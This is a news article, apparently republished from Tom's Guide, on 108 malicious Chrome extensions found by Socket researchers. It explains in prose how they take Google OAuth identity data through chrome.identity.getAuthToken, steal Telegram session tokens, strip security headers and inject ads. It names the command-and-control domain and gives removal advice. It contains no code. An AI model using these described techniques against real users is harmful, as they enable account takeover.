A coordinated campaign of 108 malicious Chrome extensions has been discovered stealing Google account credentials, hijacking Telegram sessions, and injecting ads into every page users visit. Security researchers at Socket’s Threat Research Team uncovered the operation, which affects approximately 20,000 users who installed these extensions from the Chrome Web Store. All 108 extensions communicate with the same command-and-control infrastructure, suggesting a single operator running a sophisticated data harvesting operation.
Key Takeaways
- 108 malicious Chrome extensions linked to same command-and-control server stealing user data from 20,000 installations
- 54 extensions harvest Google account identity (email, name, picture) via OAuth2 token theft
- 45 extensions contain universal backdoors that open arbitrary URLs on browser startup
- Extensions strip security headers from YouTube and TikTok to inject gambling overlays and advertisements
- Malicious code operates silently while extensions provide legitimate functionality as cover
How the malicious Chrome extensions operate
The malicious Chrome extensions employ a deceptive strategy: they provide real, working functionality to avoid detection while running hidden malicious code in the background. Gaming extensions actually work as games. Telegram sidebar clients function as advertised. Translation tools translate text. This dual-layer approach allows them to persist undetected for longer periods, accumulating stolen data while users believe they are using legitimate tools.
The technical attack chain is remarkably consistent across the campaign. In 54 of the extensions, the malicious code uses chrome.identity.getAuthToken to acquire Google OAuth2 bearer tokens without explicit user consent. The extension then fetches user information from Google’s OAuth endpoint and exfiltrates the email, name, profile picture, and unique identifier to the threat actor’s server at mines.cloudapi.stream. This stolen identity data can be used for account takeover, credential stuffing, or sold on underground markets.
Another 45 extensions contain a universal backdoor that automatically opens arbitrary URLs when the browser starts. This gives the threat actor the ability to redirect users to malicious sites, distribute additional malware, or perform drive-by downloads without user knowledge. The backdoor mechanism persists across browser sessions, ensuring the attacker maintains access even after the extension is installed.
Telegram session hijacking and data exfiltration
Perhaps the most dangerous capability in this campaign is the exfiltration of Telegram web sessions every 15 seconds. When a user logs into Telegram through their browser, the malicious extension captures the session tokens and sends them to the attacker’s server. This allows the threat actor to access the user’s Telegram account without needing the password or bypassing multi-factor authentication. Full account takeover is possible, and the attacker can read all messages, access media, and impersonate the user to contacts.
The extensions accomplish this by intercepting network traffic and stealing authentication cookies or tokens that Telegram uses to maintain sessions. Because Telegram web relies on these session identifiers, stealing them is equivalent to stealing the login credentials themselves. Users have no indication their accounts are compromised until the attacker acts.
Ad injection and security header stripping
A subset of the malicious Chrome extensions targets YouTube and TikTok users specifically by stripping critical security headers from these sites before they load. By removing Content Security Policy, X-Frame-Options, and CORS headers, the extensions allow the attacker to inject content directly into the page. The injected content includes gambling overlays, fake advertisements, and redirect links that generate revenue for the threat actor or distribute additional malware.
Two extensions go further by injecting content scripts into every single page a user visits, not just YouTube and TikTok. This gives the attacker the ability to monitor all browsing activity, steal form data entered on any website, or redirect users to phishing pages. One extension even proxies all translation requests through the threat actor’s server, capturing the text being translated and potentially sensitive information users intended to keep private.
Published identities and Chrome Web Store presence
The 108 extensions were published under five distinct publisher identities: Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt. This fragmentation across multiple publisher accounts was likely intended to evade detection by distributing the malicious extensions across different storefronts and making the campaign appear as separate, unrelated developers. However, the shared command-and-control infrastructure and identical code patterns revealed the coordinated nature of the operation.
At the time of discovery in April 2026, all 108 extensions were still live in the Chrome Web Store. Socket’s researchers submitted takedown requests to both Google and the Chrome Web Store, but the extensions remained available for installation. The extensions span multiple categories including gaming (slot machine simulators, Keno games), Telegram sidebar clients, YouTube and TikTok enhancers, text translation tools, page utilities, and social media tools. This broad category distribution helped the malicious extensions blend in with legitimate extensions and avoid raising suspicion.
Malware-as-a-Service infrastructure
The campaign operates as a Malware-as-a-Service (MaaS) model, meaning the threat actor is likely selling access to the stolen data and compromised sessions to third parties. Rather than using the stolen credentials themselves, the operator is monetizing the infrastructure by providing other cybercriminals with access to Google accounts, Telegram sessions, and the ability to inject ads or malware into victim browsers. This business model explains why the campaign is so large and why the attacker invested in building such sophisticated data collection mechanisms.
How to identify and remove malicious Chrome extensions
Users can check their installed extensions by opening Chrome, clicking the menu icon (three vertical dots), selecting More Tools, then Extensions. Review the list and look for unfamiliar extensions, especially those in the gaming, translation, or social media categories that were not explicitly installed. Check the publisher name against the five identities mentioned: Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt. Socket has published a full list of all 108 extension IDs and names in their security report.
If any suspicious extension is found, click the remove button (trash icon) next to it in the Extensions menu. After removal, consider changing passwords for critical accounts like Google, Telegram, email, and banking services, as these credentials may have been compromised. Monitor account activity for unauthorized access or unusual login locations. If you use two-factor authentication, enable it on all important accounts to prevent attackers from using stolen passwords.
Why these extensions bypassed Chrome’s security checks
The Chrome Web Store has automated and manual review processes designed to catch malicious extensions before they are published. However, this campaign succeeded because the extensions provided legitimate functionality alongside the malicious code. Reviewers testing the extensions would see a working game or translation tool and approve it, unaware of the hidden background scripts stealing data. The threat actor deliberately included real features to defeat detection, a technique known as living-off-the-land or blending legitimate and malicious code.
Additionally, the extensions used obfuscation and encoding to hide the malicious code from automated scanners. The code contained Russian language comments, suggesting the developers are Russian-speaking, but this does not constitute a confirmed attribution to any specific threat actor or nation-state. The sophistication of the operation and the scale of the campaign suggest a well-resourced group with experience in evading security controls.
What should Chrome users do now?
Beyond removing the 108 known malicious extensions, users should adopt practices to reduce the risk of installing malicious extensions in the future. Only install extensions from publishers with established track records and positive reviews from many users. Check the extension’s privacy policy and permissions before installation, and be skeptical of extensions requesting access to all websites or to identity information. Regularly audit installed extensions and remove any that are no longer actively used.
Consider using Chrome’s security features like Safe Browsing and security checkup to monitor your Google account for suspicious activity. If you suspect your Google account has been compromised, visit the Google Account Security Checkup page to review connected devices, recent activity, and password strength. For Telegram users, log out of all sessions from the Telegram settings menu to revoke any stolen session tokens.
FAQ
How do I know if I installed one of the malicious Chrome extensions?
Check your Extensions page in Chrome and compare your installed extensions against Socket’s published list of 108 malicious extensions. The extensions are published under Yana Project, GameGen, SideGames, Rodeo Games, or InterAlt. If you find any match, remove it immediately and change your passwords.
Can malicious Chrome extensions steal my passwords?
Yes. These specific malicious extensions steal Google account credentials via OAuth2 token theft and can intercept Telegram session tokens. They can also inject content into any page you visit, potentially capturing form data or login credentials entered on other websites.
Is Google fixing the Chrome Web Store to prevent this in the future?
The research brief does not contain information about Google’s response or planned improvements to Chrome Web Store security. However, users should expect Chrome’s review processes to evolve as threats become more sophisticated.
The discovery of 108 coordinated malicious extensions demonstrates that the Chrome Web Store remains a target for sophisticated threat actors. Users cannot rely solely on Chrome’s built-in security to protect them—regular audits of installed extensions and careful vetting of new extensions before installation are essential. If you use Chrome, review your extensions now. If you find any unfamiliar or suspicious extensions, delete them immediately and change your passwords for sensitive accounts.
Edited by the All Things Geek team.
Source: Tom's Guide
